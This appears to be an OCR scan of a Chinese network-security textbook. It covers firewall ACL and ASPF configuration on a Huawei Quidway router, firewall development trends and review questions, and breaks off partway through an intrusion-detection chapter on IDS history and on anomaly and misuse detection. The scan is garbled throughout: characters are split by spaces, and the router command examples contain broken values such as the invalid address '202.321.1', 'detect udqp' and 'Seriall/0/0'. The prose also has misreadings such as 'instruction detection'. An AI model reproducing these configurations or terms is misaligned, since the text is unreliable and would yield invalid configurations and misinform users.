以 太 网 接口 Ethemet0/0/0 连接 。 公 司 内 部 对 外 提供 WWW、FTP 和 Telnet 服务 ， 公 司 内 部 
子 网 为 126.45.8.0， 其 中 ， 内 部 FTP 服务 器 地 址 为 126.45.8.1， 内 部 Telnet 服务 器 地 址 为 
126.45.8.2， 内 部 WWW 服务 器 地 址 为 126.45.8.3， 公 司 对 外 地 址 为 202.32.1.1。 在 路 由 器 
配置 了 地 址 转换 ， 这 样 内 部 PC 可 以 访问 Intemet， 外 部 PC 可 以 访问 内 部 服务 器 。 通 过 配 
置 防火 墙 ， 希 望 实现 以 下 要 求 : 

(1) 外 部 网 络 只 有 特定 用 户 可 以 访问 内 部 服务 器 。 

(2) 内 部 网 络 只 有 特定 主机 可 以 访问 外 部 网 络 。 

(3) 假定 外 部 特定 用 户 的 瑟 地 址 为 202.33.3.2。 

具体 的 配置 步骤 如 下 : 


# 在 路 由 器 Quidway 上 允许 防火 墙 

Quidway] firewall enable 

# 设 置 防火 墙 默 认 过 滤 方 式 为 允许 包 通 过 

Quidway] firewall default permit 

# 创 建 访问 控制 列表 101 

Quidway] acl number 101 

# 配 置 规则 禁止 所 有 IP 包 通 过 

Quidway-acl-adv-101] rule deny ip 

# 配 置 规则 允许 特定 主机 访问 外 部 网 ， 允 许 内 部 服务 器 访问 外 部 网 
Quidway-acl-adv-101] rule permit ip source 126.45.8.1 0 
Quidway-acl-adv-101] rule permit ip source 126.45.8.2 0 
Quidway-acl-adv-101] rule permit ip source 126.45.8.3 0 
# 创 建 访问 控制 列表 
Quidway] acl number 102 

# 配 置 规则 允许 特定 用 户 从 外 部 网 访问 内 部 服务 器 

Quidway-acl-adv-102] rule permit tcp source 202.33.3.2 0 destination 
202.321.1 0 
# 配 置 规则 允许 特定 用 户 从 外 部 网 取得 数据 (只 允许 端口 大 于 1024 的 包 ) 
Quidway-acl-adv-102] rule permit tcp destination 202.32.1.10 0 
destination-port gt 1024 

# 将 规则 101 作用 于 从 接口 Ethernet0/0/0 进入 的 包 

Quidway-Ethernet0/0/0] firewall packet-filter 101 inbound 

# 将 规则 102 作用 于 从 接口 Serial1/0/0 进入 的 包 

Quidway-Seriall/0/0] firewall packet-filter 102 inbound 


10.7.3 ASPF 配置 


ASPF (Application Specific Packet Filter) 是 针对 应 用 层 的 包 过 滤 ， 即 基于 状态 的 报 文 
过 滤 。 它 和 普通 的 静态 防火 墙 协同 工作 ， 以 便于 实施 内 部 网 络 的 安全 策略 。ASPF 能 够 检 
测试 图 通过 防火 墙 的 应 用 层 协 议会 话 信息 ， 阻 止 不 符合 规则 的 数据 报 文 穿 过 。 为 保护 网 络 
安全 , 基于 访问 控制 列表 的 包 过 滤 可 以 在 网 络 层 和 传输 层 检测 数据 包 , 防止 非法 入 侵 。ASPF 
能 够 检测 应 用 层 协议 的 信息 , 并 对 应 用 的 流量 进行 监控 。 同时 能 针对 DoS 进行 检测 和 防范 。 
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使 用 Java Blocking (Java 阻 断 ) 来 保护 网 络 不 受 有 害 的 Java Applets 的 破坏 。 它 还 支持 端 
口 到 应 用 的 映射 ， 用 于 应 用 层 协议 提供 的 服务 使 用 非 通用 端口 时 的 情况 。 它 增强 了 话 日 志 
功能 ， 可 以 对 所 有 的 连接 进行 记录 ， 包 括 记录 连接 的 时 间 、 源 地 址 、 目 的 地 址 、 使 用 的 端 
口 和 传输 的 字 节 数 。ASPF 对 应 用 层 的 协议 信息 进行 检测 ， 并 维护 会 话 的 状态 ， 检 查 会 话 
的 报 文 的 协议 和 端口 号 等 信息 ， 阻 止 恶 意 的 入 侵 。ASPF 能 对 如 下 的 协议 ， 如 FTP、HTTP、 
SMTP、RSTP、H.323、TCP 和 UDP 的 流量 进行 监测 。 

ASPF 配置 中 需要 允许 防火 墙 使 用 ， 同 时 配置 访问 控制 列表 ， 然 后 定义 一 个 ASPF 策 
略 ， 最 后 在 选 定 的 接口 上 应 用 。 

下 面 介绍 一 下 如 何 定义 一 个 ASPF 策略 。 

(1) 创建 一 个 ASPF 策略 ， 在 系统 视图 下 输入 操作 命令 : 


aspf-policy aspf-policy-number 


如 果 要 删除 一 个 ASPF 策略 ， 输 入 undo aspf-policy aspf-policy-number， 其 中 aspf- 
policy-number 为 ASPF 策略 号 ， 范 围 为 1 一 99。 
(2) 配置 空 闪 超时 值 ， 在 系统 视图 下 输入 操作 命令 : 


aging-time{syn | fin | tcp | udp}seconds. 


如 果 恢 复 默认 的 空闲 超时 值 ， 输 入 undo aging-time{syn | fin | tcp | udp}。 

该 任务 用 来 配置 TCP 的 SYN 状态 等 待 超时 值 、FIM 状态 等 待 超时 值 ，TCP 和 UDP 
会 话 表 项 空闲 状态 超时 值 。 默 认 情 况 SYN、FIN、TCP、UDP 的 超时 时 间 分 别 为 30s、5s、 
3600s 和 30s。 

(3) 配置 应 用 层 协议 检测 ， 在 系统 视图 下 输入 操作 命令 : 


detect protocol [aging-time seconds] 


如 果 要 删除 配置 的 应 用 协议 检测 ， 输 入 undo detect protocol。 
应 用 层 协议 protocol 可 取 值 fp、smtp、http。 在 protocol 选择 http 时 ， 可 以 配置 Java 
阻 断 ， 在 系统 视图 下 输入 操作 命令 : 


detect http{java-list acl-number} [aging-time seconds] 


如 果 取 消 对 HTTP 的 检测 规则 ， 输 入 undo detect http 。 
(4) 配置 一 般 TCP 和 UDP 检测 ， 在 ASPF 策略 视图 下 输入 操作 命令 。 


# 配 置 通用 TCP 协议 检测 

detect tcp [aging-time seconds] 
# 配 置 通用 UDP 协议 检测 

detect udqp [aging-time seconds] 
# 删 除 通用 TCP 协议 检测 

undo detect tcp 

# 删 除 通用 UDP 协议 检测 

undo detect udp 


(5) 在 接口 上 应 用 ， 在 接口 视图 下 ， 输 入 如 下 命令 。 
firewall aspf aspf-policy-number{inbound | outbound} 


如 果 删 除 该 接口 上 应 用 的 ASPF 策略 ， 输 入 : 


undo firewall aspf aspf-policy-number{inbound | outbound} 


(6) ASPF 显示 与 调试 。 

在 完成 上 述 配置 后 ， 在 所 有 视图 下 执行 如 下 display 命令 可 以 显示 ASPF 的 运行 情况 ， 
通过 查看 显示 信息 验证 配置 的 效果 。 在 用 户 视图 下 执行 debugging 命令 查看 ASPF 调试 
信息 。 


# 显 示 所 有 ASPF 配置 情况 

display aspf all 

# 显 示 应 用 ASPF 策略 和 访问 列表 的 接口 配置 

display aspf interface 

# 显 示 一 个 特定 ASPF 策略 的 配置 

display aspf policy aspf-policy-number 

# 显 示 ASPF 当前 会 话 状态 

display aspf session 

# 打 开 RSPF 调试 开关 

debugging aspf{all | detail | events | ftp | http | rtsp | session | smtp 
| tcp | timer | udp} 

# 关 闭 ASPF 调试 开关 

undo debugging aspf{all | detail | events | ftp | http | rtsp | session | 
smtp | tcp | timer | udp} 


10.7.4 ASPF 策略 配置 实例 


下 面 在 防火 墙 上 具体 配置 一 个 ASPF 策略 ， 来 检测 通过 防火 墙 的 FTP 和 HTTP 流量 。 
如 果 该 报 文 是 内 部 网 络 用 户 发 起 的 FTP 和 HTTP 连接 的 返回 报 文 , 则 允许 其 通过 防火 墙 进 
入 内 部 网 络 ， 其 他 报 文 被 禁止 ， 并且， 此 ASPF 策略 能 够 过 滤 掉 来 自 服务 器 122.35.2.1 的 
HITP 报 文 中 的 Java Applets。 本 例 可 以 应 用 在 本 地 用 户 需要 访问 远程 网 络 服务 的 情况 下 。 
配置 的 基本 步骤 如 下 。 


# 在 ASPF 路 由 器 上 配置 允许 防火 墙 

Quidway] firewall enable 

/* 配 置 访问 控制 列表 111， 以 拒绝 所 有 TCP 和 UDP 流量 进入 内 部 网 络 ，ASPF 会 为 允许 通过 的 流量 
创建 临时 的 访问 控制 列表 */ 

Quidway] acl number 111 

Quidway-acl-adv-111] rule deny 

/* 创 建 ASPF 策略 ， 策 略 号 为 1， 该 策略 检测 应 用 层 的 两 个 协议 : FTP 和 HTTP 协议 。 并 定义 没有 
任何 行为 的 情况 下 ， 这 两 个 协议 的 超时 时 间 为 3000s*/ 

Quidway] aspf-policy 1 


Quidway-aspf-policy-1] detect ftp aging-time 3000 
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Quidway-aspf-policy-1] detect http aging-time 3000 
Quidway-aspf-policy-1] detect http java-list 1 

# 配 置 访问 控制 列表 1， 以 过 滤 来 自 站 点 122.35.2.1 的 Java Applets 
Quidway] acl number 1 

Quidway-acl-basic-1] rule deny source 122.35.2.1 0 
Quidway-acl-basic-1] rule permit any 

# 在 接口 上 应 用 ASPF 策略 

Quidway-Seriall/0/0] firewall aspf 1 outbound 

# 在 接口 上 应 用 访问 控制 列表 111 

Quidway-Seriall/0/0] firewall packet-filter 1 inbound 


10.8 防火墙 的 发 展 趋势 


随 着 新 的 网 络 技术 的 出 现 ， 防 火 墙 技术 呈现 以 下 新 的 发 展 趋势 。 

(1) 目前 防火 墙 在 安全 性 、 效 率 和 功能 方面 的 矛盾 还 是 比较 突出 。 防 火 墙 的 技术 结构 ， 
往往 是 安全 性 高 效率 就 低 ， 效 率 高 就 会 以 牺牲 安全 为 代价 。 未 来 的 防火 墙 要 求 是 高 安全 和 
高 效率 。 使 用 专门 的 芯片 负责 访问 控制 功能 、 设 计 新 的 防火 墙 的 技术 架构 是 未 来 防火 墙 的 
方向 。 

(2) 数据 加 密 技术 的 使 用 ， 使 合法 访问 更 安全 。 

(3) 混合 使 用 包 过 滤 技术 、 代 理 服务 技术 和 其 他 一 些 新 技术 。 

(4) 目前 ， 人 们 正在 设计 新 的 人 P 协议 ITPv6。 了 协议 的 变化 将 对 防火 墙 的 建立 与 运行 
产生 深刻 的 影响 。 

(5) 分 布 式 防火 墙 。 现 在 的 防火 墙 一 般 安放 在 网 络 的 边界 ， 并 假设 内 部 网 络 中 的 所 有 
主机 是 可 信任 的 ， 所 有 的 外 部 网 络 主机 是 不 可 信任 的 。 但 是 攻击 往往 是 从 内 部 发 起 的 ， 所 
以 不 是 所 有 的 内 部 主机 都 是 可 以 信任 的 ， 因 此 提出 了 分 布 式 防火 墙 的 概念 。 分 布 式 防火 墙 
是 指 那 些 驻 留 在 网 络 中 主机 如 服务 器 或 台式 机 并 对 主机 系统 自身 提供 安全 防护 的 软件 产 
品 ; 从 广义 来 讲 ， 分 布 式 防火 墙 是 一 种 新 的 防火 墙 体 系 结构 ， 它 包含 如 下 产品 。 

Q@ 网 络 防火 墙 ， 即 传统 的 边界 防火 墙 ， 用 于 内 部 网 与 外 部 网 之 间 进 行 访问 控制 。 包 
括 内 部 网 中 各 个 子 网 之 间 的 防火 墙 ， 这 种 防火 墙 需 支 持 内 部 网 可 能 有 的 非 卫 协议。 

@ 主机 防火 墙 对 网 络 中 的 服务 器 和 台式 机 进行 防护 ， 需 要 给 每 一 台 需 要 保护 的 主 
机 安装 防火 墙 ， 这 些 主机 的 物理 位 置 可 能 在 内 部 网 中 ， 也 可 能 在 内 部 网 外 ， 如 托管 服务 器 
或 移动 办 公 的 便携 机 。 

@ 中 心 管理 : 边界 防火 墙 只 是 网 络 中 的 单一 设备 ， 管 理 是 单一 的 。 对 分 布 式 防火 墙 
来 说 ， 每 个 防火 墙 作 为 安全 监测 机 制 可 以 根据 安全 性 的 不 同 要 求 布置 在 网 络 中 的 任何 需要 
的 位 置 上 ， 但 总 体 安全 策略 又 是 统一 策划 和 管理 的 ， 安 全 策略 的 分 发 及 日 志 的 汇总 都 是 中 
心 管理 应 具备 的 功能 。 中 心 管理 是 分 布 式 防火 墙 系统 的 核心 和 重要 特征 之 一 。 

(6) 对 数据 包 的 全 方位 的 检查 。 不 仅 包 括 数据 包头 的 信息 ， 而 且 包 括 数据 包 的 内 容 信 
息 ， 查 出 恶意 行为 ， 阻 止 通过 。 
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. 什么 是 防火 墙 ? 防火 墙 按照 对 内 外 来 往 数据 的 处 理 方 法 可 以 分 为 哪 两 类 ? 
. 包 过 滤 防 火 墙 包括 哪 两 种 过 滤 方式 ? 

.防火墙 按 照 网 络 体系 结构 可 以 分 为 哪儿 类 ? 

.分布 式 防 火 墙 主 要 包括 哪儿 部 分 ? 

. 防火墙 系 统 由 哪儿 部 分 组 成 ? 

.如 何在 网 络 中 高 效 部 署 防火 墙 ， 使 其 发 挥 更 充分 的 作用 ? 
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第 11 章 入 侵 检 测 


本 章 学 习 目 标 : 

。 了 解 入 侵 检测 的 定义 ; 

了 解 入 侵 检 测 的 目标 ; 

掌握 入 侵 检测 原理 及 主要 方法 ; 

了 解 入 侵 检测 系统 模型 ; 

了 解 入 侵 检测 系统 的 优点 与 局 限 性 ; 
掌握 Snort 入 侵 检测 系统 。 


11.1 入侵 检测 概述 
11.1.1 入 侵 检 测 的 概念 


美国 国家 安全 通信 委员 会 (NSTAC) 下 属 的 入 侵 检测 小 组 (IDSG) 在 1997 年 给 出 的 
关于 “入 侵 检 测 ”(instruction detection) 的 定义 是 : 入 侵 检测 是 对 企图 入 侵 、 正 在 进行 的 
入 侵 或 已 经 发 生 的 入 侵 行为 进行 识别 的 过 程 。 

关于 “入 侵 检测 ”的 定义 ， 人 们 还 有 很 多 不 同 的 提 法 ， 其 中 包括 如 下 几 种 说 法 。 

(1) 检测 对 计算 机 系统 的 非 授 权 访问 。 

(2) 对 系统 的 运行 状态 进行 监视 ， 发 现 各 种 攻击 企图 、 攻 击 行为 或 攻击 结果 ， 以 保证 
系统 资源 的 保密 性 、 完 整 性 和 可 用 性 。 

(3) 识别 针对 计算 机 系统 和 网 络 系统 或 广义 上 的 信息 系统 的 非法 攻击 ， 包 括 检测 外 部 
非法 入 侵 者 的 恶意 攻击 或 探测 ， 以 及 内 部 合法 用 户 越权 使 用 系统 资源 的 非法 行为 。 


11.1.2 入侵 检 测 系统 的 发 展 


1980 年 4 月 ，James PAnderson 向 美国 空军 提交 了 一 份 题 为 Computer Security Threat 
Monitoring and Surveillance (计算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 ， 第 一 次 详细 阐述 
了 入 侵 检测 的 概念 ， 并 提出 了 一 种 对 计算 机 系统 风险 和 威胁 的 分 类 方法 ， 以 及 利用 审计 跟 
踪 数 据 监视 入 侵 活动 的 思想 。 

从 1984 年 到 1986 年 ， 乔治 敦 大 学 的 Dorothy Denning 和 SRICSL (SRI 公司 计算 机 科 
学 实验 室 ) 的 PeterNeumann 研究 出 了 一 个 实时 入 侵 检测 系统 模型 ， 取 名 为 IDES (入 侵 检 
测 专家 系统 )。 该 模型 由 6 个 部 分 组 成 : 主体 、 对 象 、 审 计 记 录 、 轮 廓 特征 、 异 常 记录 、 活 
动 规则 。 它 独立 于 特定 的 系统 平台 、 应 用 环境 、 系 统 弱点 以 及 入 侵 类 型 ， 为 构建 入 侵 检 测 
系统 提供 了 一 个 通用 的 框架 。 


1988 年 ，SRICSL 的 Teresa Lunt 等 人 改进 了 Denning 的 入 侵 检 测 模型 ， 使 其 包含 一 个 
异常 检测 器 和 一 个 专家 系统 ， 分 别 用 于 统计 异常 模型 的 建立 和 基于 规则 的 特征 分 析 检 测 ， 
IDS 的 结构 框架 如 图 11-1 所 示 。 

在 1988 年 的 莫 里 斯 蠕虫 事件 发 生 之 后 ， 网 络 安全 才 真 正 引 起 了 人 们 的 高 度 重视 。 美 
国 空军 、 国 家 安全 局 和 能 源 部 共同 资助 空军 密码 支持 中 心 、 劳 伦 斯 利 弗 摩尔 国家 实验 室 、 
加 州 大 学 戴 维 斯 分 校 、Haystack 实验 室 ， 开 展 对 分 布 式 入 侵 检 测 系 统 (DIDS) 的 研究 ， 将 
基于 主机 的 和 基于 网 络 的 检测 方法 集成 在 一 起 ，IDS 总 体 结 构 如 图 11-2 所 示 。 


审计 数据 源 
模式 匹配 器 轮廓 特征 引擎 S27 
异常 检测 器 主机 代理 LAN 代 理 
主机 事件 发 生 器 LAN 事件 发 生 器 
策略 规划 
警告 服 告 产生 器 主机 监视 器 LAN 监视 器 
图 11-1 IDS 框架 结构 图 11-2 IDS 总 体 结构 


从 20 世纪 90 年 代 到 现在 ， 入 侵 检测 系统 的 研发 呈现 出 百家争鸣 的 繁荣 局 面 ， 并 在 智 
能 化 和 分 布 式 两 个 方向 取得 了 长 足 性 的 进展 。 目 前 SRUCSL、 普 渡 大 学 、 加 州 大 学 等 机 构 
在 这 些 方面 的 研究 代表 了 当前 的 最 高 水 平 。 

11.1.3 入侵 检 测 目标 


入 侵 检 测 系统 通常 有 两 个 主要 目标 : 寻找 攻击 源 和 系统 恢复 。 

1， 寻找 攻击 源 

入 侵 检测 系统 的 一 个 目标 就 是 寻找 入 侵 的 发 起 源 包 括 谁 是 入 侵 者 、 入 侵 事件 从 哪 开 
台 ， 并 提供 有 效 证 据 。 通 常用 于 事件 的 归档 。 支 持 这 个 目标 的 人 声明 :“ 只 要 找到 入 侵 源 ， 
以 后 所 有 相关 的 安全 问题 都 可 以 解决 ”在 TCP/IP 网 络 ,寻找 攻 击 源 遇 到 很 多 困难 ， 因 为 ， 
入 侵 者 常常 利用 TCP/IP 协议 的 缺点 ， 伪 造 源 地 址 的 身份 。 

2. 系统 恢复 

入 侵 检测 系统 的 另 一 个 目标 着 重 于 把 系统 恢复 成 正常 。 主 要 包括 : 发 生 了 什么 事件 、 
事件 影响 的 范围 以 及 可 能 使 用 的 安全 缺陷 有 哪些 。 支持 这 个 目标 的 人 声明 :“ 我 们 不 关心 谁 
是 入 侵 者 ， 也 不 关心 他 们 攻击 的 动力 和 方法 。 我 们 只 关心 我 们 的 系统 受到 什么 损害 和 怎么 
去 恢复 它 。” 
11.1.4 入 侵 检 测 技术 的 发 展 趋势 


1. 分 析 技 术 的 改进 
入 侵 检 测 误 报 和 漏 报 的 解决 最 终 依 靠 分 析 技术 的 改进 。 目 前 入 侵 检测 分 析 方法 主要 | 11 
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有 : 统计 分 析 、 模 式 匹 配 、 数 据 重 组 、 协 议 分 析 、 行 为 分 析 等 。 

统计 分 析 是 统计 网 络 中 相关 事件 发 生 的 次 数 ， 达 到 判别 攻击 的 目的 。 模 式 匹配 利用 对 
攻击 的 特征 字符 进行 匹配 完成 对 攻击 的 检测 。 数 据 重组 是 对 网 络 连接 的 数据 流 进 行 重组 再 
加 以 分 析 ， 而 不 仅仅 分 析 单 个 数据 包 。 

协议 分 析 技 术 是 在 对 网 络 数 据 流 进行 重组 的 基础 上 ， 理 解 应 用 协议 ， 再 利用 模式 匹配 
和 统计 分 析 的 技术 来 判明 攻击 。 例 如 ， 某 个 基于 HTTP 协议 的 攻击 含有 ABC 特征 ， 如 果 
此 数据 分 散在 若干 个 数据 包 中 ， 如 一 个 数据 包含 A， 另 外 一 个 包含 B， 另 外 一 个 包含 C， 
则 单纯 的 模式 匹配 就 无 法 检测 ， 只 有 基于 数据 流 重组 才能 完整 检测 。 而 利用 协议 分 析 ， 则 
只 在 符合 的 协议 CHTTP) 检测 到 此 事件 才 会 报警 。 假 设 此 特征 出 现在 Mail 里 ， 因 为 不 符 
合 协议 ， 就 不 会 报警 。 利 用 此 技术 ， 有 效 地 降低 了 误 报 和 漏 报 。 

行为 分 析 技 术 不 仅 简 单 分 析 单 次 攻击 事件 ， 还 根据 前 后 发 生 的 事件 确认 是 否 确 有 攻击 
发 生 ， 攻 击 行为 是 否 生效 ， 是 入 侵 检测 分 析 技 术 的 最 高 境界 。 但 目前 由 于 算法 处 理 和 规则 
制定 的 难度 很 大 ， 目 前 还 不 是 非常 成 熟 ， 但 却 是 入 侵 检测 技术 发 展 的 趋势 。 目 前 最 好 综合 
使 用 多 种 检测 技术 ， 而 不 只 是 依靠 传统 的 统计 分 析 和 模式 匹配 技术 。 另 外 ， 规 则 库 是 否 及 
时 更 新 也 和 检测 的 准确 程度 相关 。 

2. 内 容 恢复 和 网 络 审计 功能 的 引入 

入 侵 检 测 的 最 高 境界 是 行为 分 析 ， 但 行为 分 析 目 前 还 不 是 很 成 熟 ， 因 此 ， 个 别 优秀 的 
入 侵 检测 产品 引入 了 内 容 恢复 和 网 络 审计 功能 。 

内 容 恢复 即 在 协议 分 析 的 基础 上 ， 对 网 络 中 发 生 的 行为 加 以 完整 的 重组 和 记录 ， 网 络 
中 发 生 的 任何 行为 都 逃 不 过 它 的 监视 。 网 络 审计 即 对 网 络 中 所 有 的 连接 事件 进行 记录 。 入 
侵 检 测 的 接 入 方式 决定 入 侵 检 测 系统 中 的 网 络 审计 不 仅 类 似 防 火 墙 可 以 记录 网 络 进出 信 
息 ， 还 可 以 记录 网 络 内 部 连接 状况 ， 此 功能 对 内 容 恢复 无 法 恢复 的 加 密 连 接 尤 其 有 用 。 

内 容 恢复 和 网 络 审计 让 管理 员 看 到 网 络 的 真正 运行 状况 ， 其 实 就 是 调动 管理 员 参 与 行 
为 分 析 过 程 。 此 功能 不 仅 能 使 管理 员 看 到 孤立 的 攻击 事件 的 报警 ， 还 可 以 看 到 整个 攻击 过 
是， 了 解 攻 击 确 实 发 生 与 否 ， 查 看 攻击 者 的 操作 过 程 ， 了 解 攻 击 造成 的 危害 。 不 但 发 现 已 
知 攻击 ， 同 时 发 现 未 知 攻击 。 不 但 发 现 外 部 攻击 者 的 攻击 ， 也 发 现 内 部 用 户 的 恶意 行为 。 
毕竟 管理 员 是 最 了 解 其 网 络 的 , 管理 员 通过 此 功能 的 使 用 , 很 好 地 达成 了 行为 分 析 的 目的 。 
但 使 用 此 功能 的 同时 需 注 意 对 用 户 隐私 的 保护 。 

3. 集成 网 络 分 析 和 管理 功能 

入 侵 检 测 不 但 对 网 络 攻击 是 一 个 检测 ， 同 时 ， 入 侵 检测 可 以 收 到 网 络 中 的 所 有 数据 ， 
对 网 络 的 故障 分 析 和 健康 管理 也 可 起 到 重大 作用 。 当 管理 员 发 现 某 台 主 机 有 问题 时 ， 也 希 
望 能 马上 对 其 进行 管理 。 入 侵 检测 也 不 应 只 采用 被 动 分 析 方 法 ， 最 好 能 和 主动 分 析 结 合 。 
所 以 ， 入 侵 检 测 产品 集成 网 管 功能 ， 扫 描 器 (Scanner)、 嗅 探 器 〈Sniffer) 等 功能 是 以 后 发 
展 的 方向 。 

4. 安全 性 和 易 用 性 的 提高 

入 侵 检测 是 个 安全 产品 ， 自 身 安全 极为 重要 。 因 此 ， 目 前 的 入 侵 检测 产品 大 多 采用 硬 
件 结构 ， 黑 洞 式 接 入 ， 免 除 自身 安全 问题 。 同 时 ， 对 易 用 性 的 要 求 也 日 益 增 强 ， 例 如 全 中 
文 的 图 形 界 面 ， 自 动 的 数据 库 维 护 ， 多 样 的 报表 输出 。 这 些 都 是 优秀 入 侵 产品 的 特性 和 以 
后 继续 发 展 细 化 的 趋势 。 


5. 改进 对 大 数据 量 网 络 的 处 理 方法 

随 着 对 大 数据 量 处 理 的 要 求 ， 入 侵 检 测 的 性 能 要 求 也 逐步 提高 ， 出 现 了 千 兆 入 侵 检测 
等 产品 。 但 如 果 入 侵 检测 产品 不 仅 具备 攻击 分 析 功 能 , 同时 具备 内 容 恢复 和 网 络 审计 功能 ， 
则 其 存储 系统 一 般 工 作 在 千 兆 环境 以 上 。 这 种 情况 下 ， 网 络 数据 分 流 也 是 一 个 很 好 的 解决 
方案 ， 性 价 比 也 较 好 。 这 也 是 国际 上 较 通 用 的 一 种 做 法 。 

6. 防火 墙 联动 功能 

入 侵 检测 发 现 攻 击 ， 自 动 发 送 给 防火 墙 ， 防 火 墙 加 载 动态 规则 拦截 入 侵 ， 称 为 防火 墙 
联动 功能 。 目 前 此 功能 还 没有 到 完全 实用 的 阶段 ， 主 要 是 一 种 概念 。 随 便 使 用 会 导致 很 多 
问题 。 目 前 主要 的 应 用 对 象 是 自动 传播 的 攻击 ， 如 Nimda 等 ， 联 动 只 在 这 种 场合 有 一 定 的 
作用 。 无 限制 地 使 用 联动 ， 如 未 经 充分 测试 ， 对 防火 墙 的 稳定 性 和 网 络 应 用 会 造成 负面 影 
响 。 但 随 着 入 侵 检 测 产品 检测 准确 度 的 提高 ， 联 动 功能 日 益 趋向 实用 化 。 


11.2 ”入 侵 检测 原理 及 主要 方法 


11.2.1 异常 检测 基本 原理 

异常 检测 技术 又 称 为 基于 行为 的 入 侵 检测 技术 ， 用 来 识别 主机 或 网 络 的 异常 行为 。 它 
假设 攻击 与 正常 的 (合法 的 ) 活动 有 明显 的 差异 。 异 常 检测 首先 收集 一 段 时 间 操作 活动 的 
历史 数据 ， 再 建立 代表 主机 、 用 户 或 网 络 连接 的 正常 行为 描述 库 ， 然 后 收集 事件 数据 并 使 
用 一 些 不 同 的 方法 来 决定 所 检测 到 的 事件 活动 是 否 偏离 了 正常 行为 模式 ， 从 而 判断 是 否 发 
生 了 入 侵 。 异 常 检测 模型 的 结构 如 图 11-3 所 示 。 


正常 行为 描述 库 
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动态 更 新 描述 
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异常 检测 


图 11-3 异常 检测 模型 的 结构 


基于 异常 检测 原理 的 入 侵 检测 方法 有 以 下 几 种 。 

(1) 统计 异常 检测 方法 。 

(2) 特征 选择 异常 检测 方法 。 

(3) 基于 贝 叶 斯 推理 异常 检测 方法 。 

(4) 基于 贝 叶 斯 网 络 异常 检测 方法 。 

(5) 基于 模式 预测 异常 检测 方法 。 

其 中 ， 比 较 成 熟 的 方法 是 统计 异常 检测 方法 和 特征 选择 异常 检测 方法 。 目 前 ， 已 经 有 
根据 这 两 种 方法 开发 的 软件 产品 上 市 ， 其 他 方法 目前 还 停留 在 理论 研究 阶段 。 
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11.2.2 ” 误 用 检测 基本 原理 


误 用 检测 技术 又 称 基 于 知识 的 检测 技术 。 它 假设 所 有 入 侵 行为 和 手段 都 能 够 表达 为 一 
种 模式 或 特征 ， 并 对 已 知 的 入 侵 行为 和 手段 进行 分 析 ， 提 取 检 测 特 征 ， 构 建 攻击 模式 或 攻 
击 签名 ， 通 过 系统 当前 状态 与 攻击 模式 或 攻击 签名 的 匹配 判断 入 侵 行为 。 误 用 检测 模式 的 
结构 如 图 11-4 所 示 。 
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图 11-4 误 用 检测 模型 的 结构 


误 用 检测 技术 的 优点 在 于 可 以 准确 地 检测 已 知 的 入 侵 行 为 ， 缺 点 是 不 能 检测 未 知 的 入 
侵 行为 。 误 用 检测 的 关键 在 于 如 何 表达 入 侵 行为 ， 即 攻击 模型 的 构建 ， 把 真正 的 入 侵 与 正 
常 行为 分 开 来 。 基 于 误 用 检测 原理 的 入 侵 检测 方法 有 以 下 几 种 。 

(1) 基于 条 件 的 概率 误 用 检测 方法 。 

(2) 基于 专家 系统 的 误 用 检测 方法 。 

(3) 基于 状态 迁移 分 析 的 误 用 检测 方法 。 

(4) 基于 键盘 监控 的 误 用 检测 方法 。 

(5) 基于 模型 的 误 用 检测 方法 。 


11.2.3 各 种 入 侵 检 测 技术 


当前 在 网 络 安全 技术 中 存在 多 种 入 侵 检测 技术 ， 下 面 分 别 对 常见 的 一 些 入 侵 检 测 技术 
进行 简要 介绍 。 

1. 基于 概率 统计 的 检测 

基于 概率 统计 的 检测 技术 是 异常 入 侵 检测 中 最 常用 的 技术 ， 它 对 用 户 历史 行为 建立 模 
型 。 根 据 该 模型 ， 当 IDS 发 现 有 可 疑 的 用 户 行为 发 生 时 就 保持 跟踪 ， 并 监视 和 记录 该 用 户 
的 行为 。 

SRI(Standford Research Institute ) 研制 开发 的 IDES 是 一 个 典型 的 实时 监测 系统 。 IDES 
能 根据 用 户 以 前 的 历史 行为 生成 每 个 用 户 的 历史 行为 记录 库 ， 并 能 自 适应 地 学 习 被 检测 系 
统 中 每 个 用 户 的 行为 习惯 。 当 某 个 用 户 改变 其 行为 习惯 时 ， 这 种 异常 就 被 检测 出 来 。 这 种 
系统 具有 固有 的 弱点 ， 例 如 ， 用 户 的 行为 非常 复杂 ， 因 而 要 想 准确 地 匹配 一 个 用 户 的 历史 
行为 和 当前 行为 是 非常 困难 的 。 这 种 方法 的 一 些 假 设 是 不 准确 或 不 贴切 的 ， 容 易 造成 系统 
误 报 、 错 报 或 漏 报 。 

在 这 种 实现 方法 中 ,检测 器 首先 根据 用 户 对 象 的 动作 为 每 一 个 用 户 都 建立 一 个 用 户 特 
征 表 ， 通 过 比较 当前 特征 和 已 存储 的 以 前 特征 判断 是 否 为 异常 行为 。 用 户 特征 表 需 要 根据 


审计 记录 情况 不 断 加 以 更 新 。 在 SRI 的 IDES 中 给 出 了 一 个 特征 简 表 的 结构 : 《变量 名 ， 行 
为 描述 ,例外 情况 ， 资源 使 用 ， 时 间 周 期 ， 变量 类 型 ， 阔 值 ， 主 体 ,客体 , 特征 值 }。 其 中 ， 
变量 名 、 主 体 、 客 体 唯一 确定 了 特征 简 表 ， 特 征 值 由 系统 根据 审计 数据 周期 产生 。 这 个 特 
征 值 是 所 有 有 悖 于 用 户 特征 的 异常 程度 值 的 函数 。 

这 种 方法 的 优越 性 在 于 能 应 用 成 熟 的 概率 统计 理论 ， 不 足 之 处 在 于 : 

(1) 统计 检测 对 于 事件 发 生 的 次 序 不 敏感 ， 完 全 依靠 统计 理论 ， 可 能 会 漏 掉 那 些 利用 
彼此 相关 联 事件 的 入 侵 行为 。 

(2) 定义 判断 入 侵 的 阔 值 比较 困难 ， 闭 值 太 高 则 误 检 率 提高 ， 阔 值 太 低 则 漏 检 率 提高 。 

2. 基于 神经 网 络 的 检测 

基于 神经 网 络 的 检测 技术 的 基本 思想 是 用 一 系列 信息 单元 训练 神经 单元 ， 在 给 定 一 个 
输入 后 ， 就 可 能 预测 出 输出 。 它 是 对 基于 概率 统计 的 检测 技术 的 改进 ， 主 要 克服 了 传统 的 
统计 分 析 技 术 的 一 些 问题 。 

基于 神经 网 络 的 模块 ， 将 当前 命令 和 刚 过 去 的 严 个 命令 组 成 网 络 的 输入 ,其 中 , 球 是 
神经 网 络 预测 下 一 个 命令 时 所 包含 的 过 去 命令 集 的 大 小 。 根 据 用 户 代表 性 命令 序列 训练 网 
